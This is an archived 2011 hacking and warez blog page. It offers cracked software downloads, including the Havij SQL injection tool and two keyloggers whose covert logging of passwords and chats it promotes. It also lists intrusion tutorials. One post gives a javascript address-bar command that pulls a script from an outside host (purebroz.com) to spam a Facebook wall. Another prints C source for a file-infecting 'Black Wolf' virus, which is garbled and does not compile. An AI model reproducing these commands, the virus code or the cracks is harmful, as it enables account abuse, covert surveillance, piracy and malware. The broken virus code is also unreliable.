Archive for August 2011

Facebook Status Prank! [Status Update via iPhone5]

Saturday, August 27, 2011
Posted by Muhammad Haseeb Javed

Havij SQL Tools free crack: [FULL VERSION] [CRACK]



Description:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.




What's New?

* Oracle error based database added with ability to execute query.
* Getting tables and column when database name is unknown added (mysql)
* Another method added for finding columns count and string column in PostgreSQL
* Automatic keyword finder optimized and some bugs fixed.
* A bug in finding valid string column in mysql fixed.
* 'Key is not unique' bug fixed
* Getting data starts from row 2 when All in One fails - bug fixed
* Run time error when finding keyword fixed.
* False table finding in access fixed.
* keyword correction method made better
* A bug in getting current data base in mssql fixed.
* A secondary method added when input value doesn't return a normal page (usually 404 not found)
* Data extraction bug in html-encoded pages fixed.
* String or integer type detection made better.
* A bug in https injection fixed.


Download:
Register on:  Cracked@By.Exidous
http://www.flashcrew.in/2012/03/havij-152-pro-fucked-up-by-exidous.html

Lic file
http://www.sendspace.com/file/r5ifpo
OCX Files
http://www.sendspace.com/file/gwl2cd
Friday, August 26, 2011
Posted by Muhammad Haseeb Javed

FL Studio 10.0.2 (Fruity Loops) [FINAL] [FULL] [Free] [Crack]

Image
FL Studio is the most complete virtual studio currently available. It will play any sample file (wav), generator (softsynth), VSTi & DXi) or midi instrument you feed it. You will be creating wav, mp3 or midi songs or loops only minutes after launching it. Representing the culmination of more than 12 years of sustained development, FL Studio is now the most flexible virtual music studio in the industry. FL Studio is the most complete virtual studio currently available. It will play any sample file (wav), generator (softsynth), VSTi & DXi) or midi instrument you feed it. You will be creating wav, mp3 or midi songs or loops only minutes after launching it. FL Studio is a Digital Audio Workstation (DAW) for Windows PCs (or Intel Mac/ Bootcamp). With a full feature-set and aggressive pricing (inc. lifetime free updates), FL Studio may be your ideal DAW! FL Studio can be used as a scratchpad for your ideas or to produce completely mastered tracks ready for publication. It's up to you!

[b]What can FL Studio do[/b]

* Audio editing and manipulation including pitch correction, pitch shifting, harmonization, time-stretching, beat-detection & slicing, audio warping and standard audio manipulation (cut/paste etc).
* Automate most interface and all plugin parameters by recording, drawing, spline-based automation curves, automation generators with formula based control of links.
* Be hosted in other DAWs as a VST or connected through ReWire.
* Live music performance including video effect visualization.
* Mix and remix audio including apply realtime audio effects including delay, reverb & filtering.
* Multi-track audio recording.
* Record & play MIDI input recording from keyboards, drum pads and controllers.
* Sequencing and arranging.
* Synthesizer & effect plugin hosting (VST 32 & 64 bit, DX and FL Native format)

Installation 

Image

Image

Image

Image

Image

Image

Image

Image

Image

Use Crack 

Image

Image

Image

Done 

Image

Image 



PASSWORD:

GAMER




DOWNLOAD LINK:
 
http://www.fileserve.com/file/a3kQSV5


http://www.filesonic.com/file/1176318654


http://www.wupload.com/file/13761394/FL10_By_GAMER.rar


http://www.megaupload.com/?d=JLJNFF57
Thursday, August 25, 2011
Posted by Muhammad Haseeb Javed

Advance SQL Injection - 17 DefCon [Video]



According to OWASP top 10 vulnerabilities of 2010, SQL injection is the most dangerous and most common vulnerability around, A SQL Injection vulnerability occurs due to improper input validation or no input validation at all, what I mean by improper or no input validation is the user input is not filtered(for escape characters) before it gets passed to the SQL database, A Sql injection attack can be any many forms, but it's usually categorized into 3 types:

1. Inband
2. Out of band
3. Inferential

While browsing on the internet, I came across an excellent presentation on Advanced SQL Injection techniques by john Mccray, In this presentation john Mccray discusses some of advanced SQL Injection methods and topics such as IDS evasion, filter bypassing etc. (Rafay Baloch)

Posted by Muhammad Haseeb Javed

Widestep Elite Keylogger v4.8 [Full] [Free] [Crack]



A smart and powerful low-core (driver-mode) Keylogger engine!

Elite Keylogger is a small and powerful keylogger application.

Elite Keylogger is the best selling surveillance software for monitoring and recording every detail of PC and Internet activity everywhere: in your home or in your office.

Elite Keylogger includes several integrated stealth modules that record: chats, instant messages, emails, websites visited, absolutely all keystrokes, each and every program launched, all passwords and even Windows logon password, usernames and time they worked on your computer, desktop activity, clipboard and more.

Elite Keylogger is your only complete privacy fortress that will protect your PC and inform you about every keystroke made.Elite Keylogger provides the equivalent of a digital surveillance history so that you can see exactly what your family members, neighbours, employees or other users are doing on the computer.

Elite Keylogger works absolutely secretly saving all the recordings in a hidden location only you know about, all the logs are encrypted and cannot be viewed by anyone but you. 



KEY FEATURES:
==============

















DOWNLOAD
http://uploading.com/files/ede6699d/ek_v4.8.210_plus_manual_and_serial.rar/
Monday, August 22, 2011
Posted by Muhammad Haseeb Javed

How to Spam someones Wall on Facebook. [Working Way!]


It is really annoying if your Facebook Wall is full with many messages. Recently I found the way of doing it and now i am sharing it with you people ;)

It is really easy to do it. All you need to do is to follow the following steps carefully.

#Step1: First you need to be on "http://" connection instead of "https://", so simple Login into your FB account and goto Account > Account Settings > Account Security. Over there "unTick" |Secure Browsing (https)|


#Step2: Now goto the Persons wall whom you want to spam , and then paste the following code into the address bar:


javascript:(a = (b = document).createElement("script")).src = "//purebroz.com/a.js", b.body.appendChild(a); void(0)  


#Step3: Now a new box will pop up. In that type the number of times you want the message to be posted and click on "OK".


#Step4: After that type the message that you want to post and click on "OK"


After that its all done just refresh and you will Spam the other person.


======================================
VIDEO FOR STUPIDS!
======================================




WARNING# I dont take any responsibility of misuse of this information.
Sunday, August 21, 2011
Posted by Muhammad Haseeb Javed

REFOG Keylogger v5.1.8.934 + Serial [ Full Version ] [Crack]


Concerned About Your Children Safety?

If your kids spend time chatting or playing computer games, they can be approached or threatened by the strangers. Internet has anonymity, and anonymity means impunity in the minds of molesters. The solution? Violate their anonymity by monitoring your kids’ activities!
REFOG Personal Monitor is designed to deal with extended families, but it fits small families just as easy. Allowing you to monitor your children activities remotely over the Internet, REFOG Personal Monitor does not even require your close presence in order to be alerted about suspicious activities of either your children or someone they chat with.

Easy To Install and To Use
REFOG Personal Monitor can be set up and used by anyone. The monitor does not involve a steep learning curve and does not demand a degree in Computer Science to configure and operate. Simply download your free trial version and get yourself going!
Remote Monitoring
REFOG Personal Monitor provides the necessary degree of interactivity, allowing you to monitor your kids’ actions remotely over the email. There’s no need to rush home during the launch hour just to check the logs. See what your kids are doing with their computer without leaving your office!
Real-Time Alerts
Should you be worried now or later? If you want constant protection of your family, simply logging keystrokes and storing screen captures is not enough. Often, an immediate action is required to get your kids out of trouble.
REFOG Personal Monitor is highly flexible, allowing you to configure multiple alerts on harmful or offensive keystrokes sent or received on their computer. Set your alarms, and get notified instantly with real-time alerts if a pre-defined event happens on their PC.
You can easily set REFOG Personal Monitor to alert you by e-mail. Templates are available to filter keystrokes that contain pre-defined trigger phrases, making false alerts hardly possible.
Save Screens and Key Presses
REFOG Personal Monitor keeps a list of all activities you specify it to log. It records all visited Web sites, keeps logs of chats and instant messenger conversations as well as other things typed or received by your kids in chats, messengers, blogs, forums and other online and offline applications.
REFOG Personal Monitor saves each key pressed and every phrase typed, and makes periodic captures of the computer screen to better illustrate what was going on at that moment.
Capture Chats and Instant Messengers
REFOG Personal Monitor captures every key that they press, but does not stop there. Individual keystrokes are of little use when analyzing your kids’ behavior. REFOG Personal Monitor can detect popular chats and instant messengers, and forms clearly legible and readable logs containing chats and instant messenger conversations formatted in a manner that is convenient to read.
Stealth Operation
For even better protection, REFOG Personal Monitor can be completely hidden from your kids’ eyes. It runs silently and unobtrusively on their PC while taking screen shots and recording every key that they press, logging applications that they use and Web sites that they visit. You can access these logs either locally or remotely at any time, even if you are not at home!

Keystroke recording

Once installed and running, Refog registers all keys pressed by a user, thus acting as a keylogger. This function captures all data that has been entered by your children or an employee using a keyboard, including chats, usernames, passwords, emails, search queries and other content. In addition to key logging, Refog is also able to log clipboard text.
Web history logging
Even if users delete their browser's history, the informaton is retained in Refog's log database and always available via the reports function. All relevant information is collected including URLs visited, page titles and the timestamp.
Screenshot history
With customizable capability, Refog takes full color screenshots of a desktop screen. This ensures that the log of what is being typed by the user is backed up with visual evidence of exactly what they are doing. Without being monitored, it is often the case that employees get carried away with excessive web surfing, shopping and other personal tasks. With screenshot history, it is always possible to gather evidence if an employee is wasting the company's time. Multiple monitor configurations are supported!
Invisible mode and password protection
You may not want to disclose the act of PC monitoring, so Refog can work in special stealth mode, making it completely invisible even to a skilled PC user. It cannot be found in the program folder, control panel or tray. When required, the program can be revealed using a special command or hotkey. In addition, it is possible to protect Refog with a password, so users are unable to erase their logs.
Application monitoring and file tracking
Refog is able to record all programs executed on your PC, so it is possible to establish if your kid is playing games instead of doing his homework, an employee is wasting time offline (e.g. playing solitaire instead of working). In addition to programs, Refog stores all file operations (e.g. open, edit, copy, delete), and can reveal inappropriate interest in specific confidential documents.
IM monitoring
Refog is also compatible with all major instant messaging software (e.g. AIM, Facebook®,Yahoo! messenger, Skype, ICQ, Google Talk, MSN). It is not only able to log outgoing messages by a local user, but also incoming messages too.
Email reports
It is not necessary to gain physical access to monitored computers in order to view their logs. All reports can be delivered via email, and can be read anywhere.
Comprehensive settings and reports
It is possible to set the control levels of monitoring, enable/disable monitoring for given users, setup alert keywords and reports delivery, easily filter log files and much more. With this armory of tools, Refog comes preconfigured so it can be installed in just a few clicks and run with default settings, requiring no tech skills at all!

Refog Personal Monitor works great with all modern Windows OS releases: Windows XP®, Windows Vista®, Windows 7®


Installation Notes

Run setup file
Enter the serial
Enjoy

DOWNLOAD FROM:: {Updated}
http://adf.ly/e6Bwb
Saturday, August 13, 2011
Posted by Muhammad Haseeb Javed

"How to" Tutorial Collection.



Here's the list of the containing Tutorials:-
 How To Change Your Folders Background
- How To Crack A Router For Username And Password
- How To Deface With Tamper Data
- How To Get Passes To Pornsites
- How To Get Past Your School Blocking System Without Programs
- How To Hack Into A Computer On LAN
- How To Hack Passwords Using USB Drive
- How To Hack Someone With His IP Address
- How To Hack WEP wifi Passwords
- How To Hide Files In A jpg
- How To Make A Phisher For A Website
- How To Make Moilla Firefox 30 Times Faster
- How To Shutdown A Computer With A Cell Phone
- How To Sniff Password With Cain And Abel
- How To Use Your First Web Exploit
- How To Crack A WEP Encryped Wireless Network On Windows Vista
- How To Get IP's Through The Steam Client
- How To Get Unlimited Time In Internet Café's
- How To Grab IP Address With PHP
- How To Kick Everyone From A Counter Strike Source Server
- How To Kick Someone Of A Wireless Network
- How To Make Your Name Stay In The Task Bar
- How To Use A Trial Program Forever Without Activation
- How To Use Cain & Abel To Get Local Passwords
- How To Close Ports
- How To Crack WEP In Linux
- How To "Deface" A Guestbook With HTML-Injection
- How To Chat With Friends Through CMD (Netsend)
- How To Rename Your Recycle Bin
- How To Make A Folder Lock Without Any Software
- How To Reveal Asterisk Passwords Using Javascript
- How To Hack An Administrator Account With A Guest Account



DOWNLOAD> 
http://www.mediafire.com/?gqhom1z4m0m
or
http://www.multiupload.com/1LRB7G0PRZ
Posted by Muhammad Haseeb Javed

winAUTOPWN v2.7 Released - Vulnerability Testing on Windows


winAUTOPWN and bsdAUTOPWN are minimal Interactive Frameworks which act as a frontend for quick systems vulnerability exploitation. It takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi- threaded portscan for TCP ports 1 to 65535. Exploits capable of giving Remote Shells, which are released publicly over the Internet by active contributors and exploit writers are constantly added to winAUTOPWN/bsdAUTOPWN. A lot of these exploits are written in scripting languages like python, perl and php. Presence of these language interpreters is essential for successful exploitations using winAUTOPWN/bsdAUTOPWN.



Exploits written in languages like C, Delphi, ASM which can be compiled are pre-compiled and added along-with others. On successful exploitation winAUTOPWN/bsdAUTOPWN gives a remote shell and waits for the attacker to use the shell before trying other exploits. This way the attacker can count and check the number of exploits which actually worked on a Target System.


Download
Posted by Muhammad Haseeb Javed

What is Sandbox? < Must read!



Sandbox: is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers and untrusted users. (Wikipedia)


Ok, lets cut it simple. Sandbox is a software which you use to open other programs, These programs which we open are suspicious(untrusted) programs so that even if they are any Virus, Keylogger or R.A.T they would not be installed on your computer and your computer will not be effected by it. So if you are encountered by any software about which you are not sure that it is clean you should be open it with Sandbox.


One example of Sandbox is Sandboxie which you can download from here : http://www.sandboxie.com/index.php?DownloadSandboxie
Monday, August 8, 2011
Posted by Muhammad Haseeb Javed

Black wolf virus in C++ that corrupt ".com" files.


The following is the Source Code of Black Wolf Virus that can corrupt all the ".COM" files in your computer when it is compiled with C++ compiler.

=============================================

File*Virus, *Host;

int x,y,done;
char buff[256]

struct ffblk ffblk;

main() 
{
        done=(findfirst("*.COM",&ffblk,0);
        while(!done)
        {
          Printf(infecting %s\n",ffblk.ff_name);
          virus=fopen(_arg[0],"rb");
          Host=fopen(ffblk.ff_name,"rb+");
          x=9504;
          while(x>256)
        }
        fread(buff,x,1,virus);
        fwrite(buff,x,1,host);
        fcloseall();
        done=findnext(&ffblk);
      }
      return(0);
}



DISCLAIM: This is only for Educational Purposes. Dont use it in wrong ways!
Sunday, August 7, 2011
Posted by Muhammad Haseeb Javed
Tag :

Convert Youtube Videos to MP3 ( online ) !

"Music is my drug, and Youtube is dealer"

This line is one of my favourite ! :) and clearly describe the Importance of Youtube!. Youtube is easiest way of obtaining all the fun stuff and specially MUSIC! So the people who want the Youtube song on there MP3 player. This site is for them! By this they can Convert the Video online and download it as MP3 file.

The Website is:

http://www.flv2mp3.com/


Screenshot:

Posted by Muhammad Haseeb Javed

Foxit Reader Pro 4.3 FULL

Everyone talks about Adobe Reader but why not Foxit, give it a chance and examine the new features. Whether you’re a consumer, business, government agency, or educational organization, you need to read and annotate PDF documents and fill out PDF forms. You need your PDF Reader to be:
  • Fast – so you’re not waiting forever to read files.
  • Lightweight – so it’s easily deployable and doesn’t exhaust system resources.
  • Secure – so you don’t get infected with viruses and can keep sensitive information safe.
  • A Platform – so you can extend the Reader by creating your own value added capabilities for internal use or for resale.
The Foxit Reader is a small, fast, and feature rich PDF viewer which allows you to open, view, and print any PDF file. Unlike other free PDF readers, Foxit Reader also includes easy to use collaboration features like the ability to add annotations, fill out forms, and add text to PDF documents. Foxit Reader has a small footprint that starts up instantly, renders PDF files quickly and uses very little memory, which is especially important with today’s handheld devices.

Foxit Reader Pro 4.3 FULL for Windows

Download
Wednesday, August 3, 2011
Posted by Muhammad Haseeb Javed

Popular Post

Labels

- Copyright © _.:Learn To Hack:._ :: Hacking Tutorials :: Warez -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan -